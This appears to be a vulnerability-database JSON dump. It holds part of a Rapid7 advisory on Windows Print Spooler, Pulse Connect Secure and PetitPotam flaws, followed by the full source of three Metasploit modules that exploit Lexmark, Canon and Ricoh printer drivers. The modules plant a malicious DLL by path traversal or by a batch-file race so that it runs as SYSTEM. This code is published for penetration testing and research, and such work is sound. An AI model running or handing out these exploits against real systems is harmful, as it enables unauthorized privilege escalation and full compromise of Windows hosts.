Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher [Jacob Baines](<https://twitter.com/Junior_Baines>). Of this last group, one vulnerability \u2014 CVE-2021-38085 \u2014 remains unpatched.\n\nOn August 11, 2021, Microsoft assigned [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) to the latest Print Spooler remote code execution vulnerability which appears to require local system access and user interaction. Further details are limited at this time. However, as mitigation, Microsoft is continuing to recommend stopping and disabling the Print Spooler service. Even after this latest zero-day vulnerability is patched, we strongly recommend leaving the Print Spooler service disabled wherever possible. 
Read Rapid7\u2019s [blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) for further details and updates.\n\nWindows Print Spooler and related CVEs:\n\n * [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler presented at Black Hat 2020; exploited in the wild, Metasploit module available)\n * [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>) (patch bypass for CVE-2020-1048; Metasploit module available)\n * [CVE-2020-17001](<https://attackerkb.com/topics/oGAzAwKy1N/cve-2020-17001?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-17014](<https://attackerkb.com/topics/N9XhrkViyk/cve-2020-17014?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-1300](<https://attackerkb.com/topics/43jdEqsVY1/cve-2020-1300?referrer=blog>) (local privilege escalation technique known as \u201c[EvilPrinter](<https://twitter.com/R3dF09/status/1271485928989528064>)\u201d presented at DEF CON 2020)\n * [CVE-2021-24088](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) (new remote code execution vulnerability in the Windows local spooler, as presented at Black Hat 2021)\n * [CVE-2021-24077](<https://attackerkb.com/topics/wiyGYban1l/cve-2021-24077?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1722](<https://attackerkb.com/topics/v1Qm7veSwf/cve-2021-1722?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1675](<https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler patched in June 2021)\n * 
[CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), aka \u201cPrintNightmare\u201d\n * [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) (print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-38085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38085>) (**unpatched** print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (**unpatched** remote code execution vulnerability; announced August 11, 2021)\n\nCurrently, both [PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) CVE-2021-34527 and CVE-2020-1048 are known to be exploited in the wild. As the list above demonstrates, patching print spooler and related vulns quickly and completely has been a challenge for Microsoft for the past year or so. The multi-step mitigations required for some vulnerabilities also give attackers an advantage. Defenders should harden printer setups wherever possible, including against malicious driver installation.\n\n### Pulse Connect Secure CVE-2021-22937\n\n**Patch:** Available \n**Threat status:** Impending (Exploitation expected soon)\n\nOn Monday, August 2, 2021, Ivanti published [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) which, among other fixes, includes a fix for CVE-2021-22937 for Pulse Connect Secure VPN Appliances running 9.1R11 or prior. 
Successful exploitation of this vulnerability, which carries a CVSSv3 score of 9.1, requires the use of an authenticated administrator account to achieve remote code execution (RCE) as user `root`.\n\nPublic proof-of-concept (PoC) exploit code has not been released as of this writing. However, this vulnerability is simply a bypass of the fix for [CVE-2020-8260](<https://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=search#vuln-details>), an authentication bypass vulnerability that was heavily utilized by attackers, released in October 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has been monitoring the [Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) demonstrating that attackers have been targeting Ivanti Pulse Connect Secure products for over a year. Due to attacker focus on Pulse Connect Secure products, and especially last year\u2019s CVE-2020-8260, Rapid7 recommends patching CVE-2021-22937 as soon as possible.\n\n### PetitPotam: Windows domain compromise\n\n**Patches:** Available \n**Threat status:** Threat (Exploited in the wild)\n\nIn July 2021, security researcher [Topotam](<https://github.com/topotam>) published a [PoC implementation](<https://github.com/topotam/PetitPotam>) of a novel NTLM relay attack christened \u201cPetitPotam.\u201d The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running \u2014 including domain controllers. Rapid7 researchers have tested public PoC code against a Windows domain controller setup and confirmed exploitability. One of our [senior researchers](<https://twitter.com/wvuuuuuuuuuuuuu>) summed it up with: "This attack is too easy." 
You can read Rapid7\u2019s full blog post [here](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>).\n\nOn August 10, 2021, Microsoft released a patch that addresses the PetitPotam NTLM relay attack vector in today's Patch Tuesday. Tracked as [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>), the August 2021 Patch Tuesday security update blocks the affected API calls [OpenEncryptedFileRawA](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>) and [OpenEncryptedFileRawW](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfileraww>) through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take additional steps listed in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) to ensure their systems are fully mitigated.\n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to the vulnerabilities in this post with authenticated vulnerability checks. 
Please note that details haven\u2019t yet been released on CVE-2021-38085 and CVE-2021-36958; therefore, they are still awaiting analysis and check development.\n\n### Updates\n\n**Pulse Connect Secure CVE-2021-22937** \nOn August 24, 2021, the Cybersecurity & Infrastructure Security Agency (CISA) released [Malware Analysis Report (AR21-236E)](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>) which includes indicators of compromise (IOCs) to assist with Pulse Connect Secure investigations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T17:13:25", "type": "rapid7blog", "title": "Popular Attack Surfaces, August 2021: What You Need to Know", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2020-17001", "CVE-2020-17014", "CVE-2020-8260", "CVE-2021-1675", "CVE-2021-1722", "CVE-2021-22937", "CVE-2021-24077", "CVE-2021-24088", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", 
"CVE-2021-34527", "CVE-2021-35449", "CVE-2021-36942", "CVE-2021-36958", "CVE-2021-38085"], "modified": "2021-08-12T17:13:25", "id": "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "href": "https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-08-12T16:10:26", "description": "", "cvss3": {}, "published": "2021-08-12T00:00:00", "type": "packetstorm", "title": "Lexmark Driver Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-35449"], "modified": "2021-08-12T00:00:00", "id": "PACKETSTORM:163811", "href": "https://packetstormsecurity.com/files/163811/Lexmark-Driver-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::FileDropper \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Lexmark Driver Privilege Escalation', \n'Description' => %q{ \nVarious Lexmark Universal Printer drivers as listed at advisory TE953 \nallow low-privileged authenicated users to elevate their privileges to \nSYSTEM on affected Windows systems by modifying the XML file at \nC:\\ProgramData\\<driver name>\\Universal Color Laser.gdl \nto replace the DLL path to unires.dll with a malicious DLL path. 
\n \nWhen C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs is \nthen used to add the printer to the affected system, PrintIsolationHost.exe, \na Windows process running as NT AUTHORITY\\SYSTEM, will inspect the \nC:\\ProgramData\\<driver name>\\Universal Color Laser.gdl file and will \nload the malicious DLL from the path specified in the file. This which will \nresult in the malicious DLL executing as NT AUTHORITY\\SYSTEM. \n \nOnce this module is finished, it will use the prnmngr.vbs script \nto remove the printer it added. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Jacob Baines', # discovery, PoC, module \n'Shelby Pace', # original Ricoh driver module \n'Grant Willcox' # module \n], \n'References' => \n[ \n[ 'CVE', '2021-35449'], \n[ 'URL', 'http://support.lexmark.com/index?page=content&id=TE953'], \n[ 'URL', 'https://github.com/jacob-baines/concealed_position'], \n[ 'URL', 'https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20presentations/Jacob%20Baines%20-%20Bring%20Your%20Own%20Print%20Driver%20Vulnerability.pdf'] \n], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'Targets' => \n[ \n[ \n'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } \n] \n], \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'Stability' => [ SERVICE_RESOURCE_LOSS ] \n}, \n'DisclosureDate' => '2021-07-15', \n'DefaultTarget' => 0 \n) \n) \nregister_options( \n[OptString.new('DRIVERNAME', [false, 'The name of the Lexmark driver to exploit', ''])] \n) \nself.needs_cleanup = true \nend \n \n# Check to see if a there are Lexmark drivers in the driver store. \n# If there are, validate that they are similar to the ones we want \n# to exploit. The user can specify the driver they'd like to exploit \n# as option. Otherwise, the first vulnerable driver from the driver store \n# will be selected. 
\ndef check \nres = cmd_exec('pnputil.exe /enum-drivers') \nm = res.scan(%r{Published Name: ([^.]*\\.inf)\\r\\nOriginal Name: lmu.*?.inf\\r\\nProvider Name: Lexmark International\\r\\nClass Name: Printers\\r\\nClass GUID: {4d36e979-e325-11ce-bfc1-08002be10318}\\r\\nDriver Version: (\\d+)/\\d+/(\\d+) \\d+\\.\\d+\\.\\d+\\.\\d+}m) \n \nreturn CheckCode::Safe('No Lexmark print drivers in the driver store') if m.empty? \n \n# known vulnerable drivers \ndriver_list = ['Lexmark Universal v2', 'Lexmark Universal v2 XL', 'Lexmark Printer Software G2', 'Lexmark Printer Software G2 XL'] \nfound_drivers = [] \n \nfor path in m \nprint_status(\"Lexmark driver published at #{path[0]}\") \ninf_text = read_file(\"C:\\\\Windows\\\\inf\\\\#{path[0]}\") \nfor driver in driver_list \nif inf_text.include?(driver) \nfound_drivers.push(driver) \nend \nend \nend \n \nreturn CheckCode::Safe('None of the Lexmark drivers in the driver store are known to be vulnerable') if found_drivers.empty? \n \nfound_drivers = found_drivers.uniq \nprint_status(\"Found #{found_drivers.length} possible options:\") \nfor driver in found_drivers \nprint_status(\"\\t#{driver}\") \nend \n \n# select driver to exploit \n@drvr_name = datastore['DRIVERNAME'] \nif @drvr_name.empty? \n@drvr_name = found_drivers[0] \nprint_status(\"No user provided DRIVERNAME. 
Defaulting to \\\"#{@drvr_name}\\\"\") \nelse \nreturn CheckCode::Safe('The user specified driver is not in the driver store') unless found_drivers.include?(@drvr_name) \n \nprint_status('The user selected driver was in the driver store') \nend \n \n@gdl_file = 'C:\\\\ProgramData\\\\' + @drvr_name + '\\\\Universal Color Laser.gdl' \nCheckCode::Detected('A potentially vulnerable Lexmark print driver is available.') \nend \n \ndef do_add_printer_vbs \nscript_cmd = \"cscript \\\"#{@script_path}\\\" -a -p \\\"#{@printer_name}\\\" -m \\\"#{@drvr_name}\\\" -r \\\"lpt1:\\\"\" \nprint_status(\"Adding printer #{@printer_name}...\") \ncmd_exec(script_cmd) \nend \n \ndef add_printer \nfail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path) \nfail_with(Failure::NotFound, 'No driver name set') if @drvr_name.empty? \n \n# If the driver has never been installed, then the vulnerable file won't exist. So let's \n# install once if necessary \nif !file?(@gdl_file) \ndo_add_printer_vbs \ncleanup \nend \n \nreturn CheckCode::Safe('No Lexmark GDL file found') unless file?(@gdl_file) \n \n# dump exploit dll to disk \ndll_data = generate_payload_dll \ntemp_path = expand_path('%TEMP%\\\\') \ntemp_path.concat(Rex::Text.rand_text_alpha(5..9)) \ntemp_path.concat('.dll') \nvprint_status(\"Writing dll to #{temp_path}\") \nwrite_file(temp_path, dll_data) \nregister_files_for_cleanup(temp_path) \n \n# replace a DLL path to one in our control \ntraversal_path = '..\\\\..\\\\..\\\\..\\\\..\\\\..' 
\ntraversal_path.concat(temp_path[2..-1]) \ntext = read_file(@gdl_file) \nnew_contents = text.gsub(/unires.dll/, traversal_path) \nwrite_file(@gdl_file, new_contents) \n \n# trigger exploitaiton \ndo_add_printer_vbs \n \n# reset the path \ntext = read_file(@gdl_file) \nnew_contents = text.gsub(traversal_path, 'unires.dll') \nwrite_file(@gdl_file, new_contents) \nrescue Rex::Post::Meterpreter::RequestError => e \nfail_with(Failure::Unknown, \"#{e.class} #{e.message}\") \nend \n \ndef exploit \nfail_with(Failure::None, 'Already running as SYSTEM') if is_system? \n \nfail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter' \n \nif sysinfo['Architecture'] != payload.arch.first \nfail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver') \nend \n \n@printer_name = Rex::Text.rand_text_alpha(5..9) \n@script_path = 'C:\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\prnmngr.vbs' \nadd_printer \nend \n \ndef cleanup \nprint_status(\"Deleting printer #{@printer_name}\") \ndelete_cmd = \"cscript \\\"#{@script_path}\\\" -d -p \\\"#{@printer_name}\\\"\" \ncmd_exec(delete_cmd) \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/163811/lexmark_driver_privesc.rb.txt"}, {"lastseen": "2021-08-11T17:16:47", "description": "", "cvss3": {}, "published": "2021-08-11T00:00:00", "type": "packetstorm", "title": "Canon TR150 Driver 3.71.2.10 Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-38085"], "modified": "2021-08-11T00:00:00", "id": "PACKETSTORM:163795", "href": "https://packetstormsecurity.com/files/163795/Canon-TR150-Driver-3.71.2.10-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass 
MetasploitModule < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::FileDropper \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Canon Driver Privilege Escalation', \n'Description' => %q{ \nCanon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files \nwithin the \"CanonBJ\" directory and its subdirectories. By overwriting the DLL at \nC:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series\\LanguageModules\\040C\\CNMurGE.dll \nwith a malicious DLL at the right time whilst running the C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs \nscript to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program, \nwhich runs as NT AUTHORITY\\SYSTEM, to successfully load the malicious DLL. Successful exploitation \nwill grant attackers code execution as the NT AUTHORITY\\SYSTEM user. \n \nThis module leverages the prnmngr.vbs script \nto add and delete printers. Multiple runs of this \nmodule may be required given successful exploitation \nis time-sensitive. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Jacob Baines', # discovery, PoC, module \n'Shelby Pace' # original Ricoh module \n], \n'References' => \n[ \n['CVE', '2021-38085'], \n], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'Targets' => \n[ \n[ \n'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } \n] \n], \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Reliability' => [ UNRELIABLE_SESSION ], \n'Stability' => [ SERVICE_RESOURCE_LOSS ] \n}, \n'DisclosureDate' => '2021-08-07', \n'DefaultTarget' => 0 \n) \n) \n \nself.needs_cleanup = true \nend \n \ndef check \n@driver_path = '' \ndir_name = 'C:\\\\ProgramData\\\\CanonBJ\\\\IJPrinter\\\\CNMWINDOWS\\\\Canon TR150 series' \n \nreturn CheckCode::Safe('No Canon TR150 driver directory found') unless directory?(dir_name) \n \nlanguage_dirs = dir(dir_name) \n \nreturn CheckCode::Detected(\"Detected Canon driver directory, but no language files. Its likely the driver is installed but a printer hasn't been added yet\") unless language_dirs.length \n \n@driver_path = dir_name \n@driver_path.concat('\\\\LanguageModules\\\\040C') \nres = cmd_exec(\"icacls \\\"#{@driver_path}\\\"\") \nvulnerable = res.match(/\\\\Users:(?:\\(I\\))?\\(OI\\)\\(CI\\)\\(F\\)/) \n \nreturn CheckCode::Safe(\"#{@driver_path} directory does not exist or does not grant Users full permissions\") unless vulnerable \n \nvprint_status(\"Vulnerable language driver directory: #{@driver_path}\") \nCheckCode::Appears('Canon language driver directory grants Users full permissions') \nend \n \ndef add_printer(driver_name) \nfail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path) \n \ndll_data = generate_payload_dll \ndll_path = \"#{@driver_path}\\\\CNMurGE.dll\" \n \ntemp_path = expand_path('%TEMP%\\\\CNMurGE.dll') \n \nbat_file_path = expand_path(\"%TEMP%\\\\#{Rex::Text.rand_text_alpha(5..9)}.bat\") \ncp_cmd = \"copy /y \\\"#{temp_path}\\\" 
\\\"#{dll_path}\\\"\" \n \n# this script monitors the target dll for modification and then copies \n# over our malicious dll. As this is a time based attack, it won't \n# always be succuessful! \nbat_file = <<~HEREDOC \nattrib -a \"#{dll_path}\" \n:repeat \nfor %%i in (\"#{dll_path}\") do echo %%~ai | find \"a\" >nul || goto :repeat \ntimeout /t 1 \n#{cp_cmd} \nattrib -a \"#{dll_path}\" \nHEREDOC \n \nprint_status(\"Dropping batch script to #{bat_file_path}\") \nwrite_file(bat_file_path, bat_file) \n \nprint_status(\"Writing DLL file to #{temp_path}\") \nwrite_file(temp_path, dll_data) \nregister_files_for_cleanup(bat_file_path, temp_path) \n \nscript_cmd = \"cscript \\\"#{@script_path}\\\" -a -p \\\"#{@printer_name}\\\" -m \\\"#{driver_name}\\\" -r \\\"lpt1:\\\"\" \nbat_cmd = \"cmd.exe /c \\\"#{bat_file_path}\\\"\" \nvprint_status('Executing the batch script...') \nclient.sys.process.execute(bat_cmd, nil, { 'Hidden' => true }) \n \nprint_status(\"Adding printer #{@printer_name}...\") \ncmd_exec(script_cmd) \nrescue Rex::Post::Meterpreter::RequestError => e \nfail_with(Failure::Unknown, \"#{e.class} #{e.message}\") \nend \n \ndef exploit \nfail_with(Failure::None, 'Already running as SYSTEM') if is_system? 
\n \nfail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter' \n \nif sysinfo['Architecture'] != payload.arch.first \nfail_with(Failure::BadConfig, 'The payload should use the same architecture as the target machine') \nend \n \n@printer_name = Rex::Text.rand_text_alpha(5..9) \n@script_path = 'C:\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\prnmngr.vbs' \ndrvr_name = 'Canon TR150 series' \n \nadd_printer(drvr_name) \nend \n \ndef cleanup \nprint_status(\"Deleting printer #{@printer_name}\") \nsleep(3) \ndelete_cmd = \"cscript \\\"#{@script_path}\\\" -d -p \\\"#{@printer_name}\\\"\" \nclient.sys.process.execute(delete_cmd, nil, { 'Hidden' => true }) \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/163795/canon_driver_privesc.rb.txt"}, {"lastseen": "2020-02-09T22:44:25", "description": "", "cvss3": {}, "published": "2020-02-07T00:00:00", "type": "packetstorm", "title": "Ricoh Driver Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19363"], "modified": "2020-02-07T00:00:00", "id": "PACKETSTORM:156251", "href": "https://packetstormsecurity.com/files/156251/Ricoh-Driver-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/exploit/exe' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Ricoh Driver Privilege Escalation', \n'Description' => %q( \nVarious Ricoh printer drivers allow escalation of \nprivileges on Windows systems. 
\n \nFor vulnerable drivers, a low-privileged user can \nread/write files within the `RICOH_DRV` directory \nand its subdirectories. \n \n`PrintIsolationHost.exe`, a Windows process running \nas NT AUTHORITY\\SYSTEM, loads driver-specific DLLs \nduring the installation of a printer. A user can \nelevate to SYSTEM by writing a malicious DLL to \nthe vulnerable driver directory and adding a new \nprinter with a vulnerable driver. \n \nThis module leverages the `prnmngr.vbs` script \nto add and delete printers. Multiple runs of this \nmodule may be required given successful exploitation \nis time-sensitive. \n), \n'License' => MSF_LICENSE, \n'Author' => [ \n'Alexander Pudwill', # discovery & PoC \n'Pentagrid AG', # PoC \n'Shelby Pace' # msf module \n], \n'References' => \n[ \n[ 'CVE', '2019-19363'], \n[ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/'] \n], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Platform' => 'win', \n'Payload' => \n{ \n}, \n'SessionTypes' => [ 'meterpreter' ], \n'Targets' => \n[[ \n'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } \n]], \n'Notes' => \n{ \n'SideEffects' => [ ARTIFACTS_ON_DISK ], \n'Reliability' => [ UNRELIABLE_SESSION ], \n'Stability' => [ SERVICE_RESOURCE_LOSS ] \n}, \n'DisclosureDate' => \"Jan 22 2020\", \n'DefaultTarget' => 0 \n)) \n \nself.needs_cleanup = true \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [ false, 'Override check result', false ]) \n]) \nend \n \ndef check \ndir_name = \"C:\\\\ProgramData\\\\RICOH_DRV\" \n \nreturn CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name) \ndriver_names = dir(dir_name) \n \nreturn CheckCode::Detected(\"Detected Ricoh driver directory, but no installed drivers\") unless driver_names.length \n \nvulnerable = false \ndriver_names.each do |driver_name| \nfull_path = \"#{dir_name}\\\\#{driver_name}\\\\_common\\\\dlz\" \nnext unless directory?(full_path) \n@driver_path = full_path 
\n \nres = cmd_exec(\"icacls \\\"#{@driver_path}\\\"\") \nnext unless res.include?('Everyone:') \nnext unless res.match(/\\(F\\)/) \n \nvulnerable = true \nbreak \nend \n \nreturn CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable \n \nvprint_status(\"Vulnerable driver directory: #{@driver_path}\") \nCheckCode::Appears('Ricoh driver directory has full permissions') \nend \n \ndef add_printer(driver_name) \nfail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path) \n \ndll_data = generate_payload_dll \ndll_path = \"#{@driver_path}\\\\headerfooter.dll\" \n \ntemp_path = expand_path('%TEMP%\\\\headerfooter.dll') \nvprint_status(\"Writing dll to #{temp_path}\") \n \nbat_file_path = expand_path(\"%TEMP%\\\\#{Rex::Text.rand_text_alpha(5..9)}.bat\") \ncp_cmd = \"copy /y \\\"#{temp_path}\\\" \\\"#{dll_path}\\\"\" \nbat_file = <<~HEREDOC \n:repeat \n#{cp_cmd} && goto :repeat \nHEREDOC \n \nwrite_file(bat_file_path, bat_file) \nwrite_file(temp_path, dll_data) \nregister_files_for_cleanup(bat_file_path, temp_path) \n \nscript_cmd = \"cscript \\\"#{@script_path}\\\" -a -p \\\"#{@printer_name}\\\" -m \\\"#{driver_name}\\\" -r \\\"lpt1:\\\"\" \nbat_cmd = \"cmd.exe /c \\\"#{bat_file_path}\\\"\" \nprint_status(\"Adding printer #{@printer_name}...\") \nclient.sys.process.execute(script_cmd, nil, { 'Hidden' => true }) \nvprint_status(\"Executing script...\") \ncmd_exec(bat_cmd) \nrescue Rex::Post::Meterpreter::RequestError => e \ne_log(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nend \n \ndef exploit \nfail_with(Failure::None, 'Already running as SYSTEM') if is_system? 
\n \nfail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter' \n \nif sysinfo['Architecture'] != payload.arch.first \nfail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver') \nend \n \n@driver_path = '' \nunless check == CheckCode::Appears || datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override') \nend \n \n@printer_name = Rex::Text.rand_text_alpha(5..9) \n@script_path = \"C:\\\\Windows\\\\System32\\\\Printing_Admin_Scripts\\\\en-US\\\\prnmngr.vbs\" \ndrvr_name = @driver_path.split('\\\\') \ndrvr_name_idx = drvr_name.index('RICOH_DRV') + 1 \ndrvr_name = drvr_name[drvr_name_idx] \n \nadd_printer(drvr_name) \nend \n \ndef cleanup \nprint_status(\"Deleting printer #{@printer_name}\") \nRex.sleep(3) \ndelete_cmd = \"cscript \\\"#{@script_path}\\\" -d -p \\\"#{@printer_name}\\\"\" \nclient.sys.process.execute(delete_cmd, nil, { 'Hidden' => true }) \nend \nend \n`\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/156251/ricoh_driver_privesc.rb.txt"}], "cve": [{"lastseen": "2023-05-23T15:33:01", "description": "The Lexmark Universal Print Driver version 2.15.1.0 and below, G2 driver 2.7.1.0 and below, G3 driver 3.2.0.0 and below, and G4 driver 4.2.1.0 and below are affected by a privilege escalation vulnerability. 
A standard low priviliged user can use the driver to execute a DLL of their choosing during the add printer process, resulting in escalation of privileges to SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T15:15:00", "type": "cve", "title": "CVE-2021-35449", "cwe": ["CWE-732"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 